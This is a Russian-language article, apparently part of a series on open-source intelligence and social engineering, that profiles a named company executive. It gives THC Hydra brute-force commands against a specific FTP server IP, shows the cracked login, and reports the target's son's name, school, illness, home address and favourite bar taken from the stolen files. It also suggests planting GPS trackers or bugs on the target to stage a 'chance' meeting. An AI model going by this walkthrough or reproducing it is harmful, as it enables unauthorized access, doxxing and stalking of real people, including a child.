Как найти твой бар в Google Maps?

Продолжаем цикл статей по поиску из открытых источников.

Привет, анон. Я вижу, что у тебя есть интерес к прошлым статьям по социальной инженерии.

Если не читал, самое время посмотреть две предыдущие части:

1. Какое пиво пьет системный администратор?
2. Как найти красотку в Tinder?

Сегодня мы продолжим и разберем несколько полезных методов, которые позволят прокачать скил.

В этой статье разберем цепочку с Adam Wallace, CMO в компании.

Работа с PDF документами

Очень важно работать со всеми документами. Они являются кладезем информации. Обязательно анализируйте и ищите все упоминания сайта компании, или с персональным брендом. Почти всегда это дает результат. В данном случае мы будем работать с форматом pdf. Можно искать также форматы: doc, pptx, xml, txt. В последнем иногда бывают пароли от разных сервисов)

notsopositive.online filetype:pdf

Находим WhitePaper, который может нам помочь разобраться с проектом и найти дальнейшие зацепки. Займемся его небольшим анализом. В документе всего 4 страницы. Есть дорожная карта и больше никакой информации. В конце пересылка на обратную форму и корпоративная почта.

Есть отличный ресурс — Pdfcandy, который позволяет проанализировать документ по мета-данным. Можно также воспользоваться другими утилитами. Но так или иначе мы получаем важную информацию, это ник создателя, а также дату создания. С последним мы работать не будем, а лучше начнем распутывать цепочку по автору с его c ником sumcoinz.

Получение доступа к FTP-серверу

В прошлых статьях разведка начиналась с очень полезного инструмента Maltego. После добавления граф с доменом был показан FTP сервер.

Если провести еще одну трансформацию, то можно было получить реальный IP адрес. Таким образом, имея IP-адрес и никнейм можно переходить на следующий уровень.

После этого, у нас есть все данные для проведения атаки на FTP (IP и никнейм). Для перебора можно использовать самый популярный словарь rockyou. Для брута необходима утилита THC Hydra (описание + примеры использования). После этого можно начинать перебор. Бывают моменты, когда для получения доступа необходимо использовать разные логины. Поэтому можно попробовать в других случаях: root, admin.

Команда:

hydra -s 21 -v -V -l sumcoinz -P /usr/rockyou.txt 178.170.172.72 ftp

Полученный результат: login: sumcoinz password: monkey

Использование опций:

-s — ПОРТ, в нашем случае 21;
-v -V — Вербальный режим / показывать логин + пароль для каждой попытки;
-L — Логин;
-P — Словарь для брута с указанием директории;
ftp — протокол.

Например, если мы не знаем точно логина, то можно добавить все вариации в файл в директорию и брутить по нескольким возможным вариантам. Тогда команда будет выглядеть таким образом:

hydra -s 21 -v -V -L /usr/login.txt -P /usr/rockyou.txt 178.170.172.72 ftp

После этого можно пройти авторизацию и найти интересные документы. Сам брут занимает не так много времени (в данном случае 2–3 минуты). После этого перед нами будут открыты файлы для дальнейшего анализа. Помимо разных установок, находим важные скриншоты и документы.

В одном из файлов есть очень много информации. Это имя сына, адрес школы и дома.

Я думаю, что с этого можно вынести простое правило: не нужно загружать личные данные и информацию на корпоративные хранилища. Лучше отдельно использовать ресурсы для работы и личной жизни.

Работаем с ГЕО-данными

Находим еще один скриншот — переписка с другом Адама, в котором они переписываются о местоположении бара Адама, в котором он находится. Для определения названия можно использовать любой сервис с картами, который позволит определить место и пройти этот маршрут по известным подсказкам.

Разобрав все подсказки и направления, а также ключевые объекты можно установить точные координаты и название бара, в котором находиться наш Адам Уоллас. Очень важно уметь пользоваться в таких ситуациях любим сервисом карт. Также можно определять основные маршруты передвижения, которые могут позволить определить популярные места.

Вообще эта тема заслуживает отдельного внимания. Если нужно встретиться или имитировать случайную встречу, то можно использовать довольно много разных способов. На рынке полно GPS-трекеров, а также разных маленьких датчиков и жучков, которые можно легко передать цели.

Что мы узнали?

• доступ до FTP-сервера с различными документами;
• никнейм;
• домашний адрес;
• имя сына;
• название любимого бара.

Заключение

Вот такими способами удалось получить достаточно много данных, которые позволили собрать практически всю необходимую информацию, а также получить доступ к FTP. Проанализировав документы, удалось получить больше информации о местонахождении и любимом баре. В других фото была и другая информация, включая информацию о болезни сына и адреса места обучения в школе.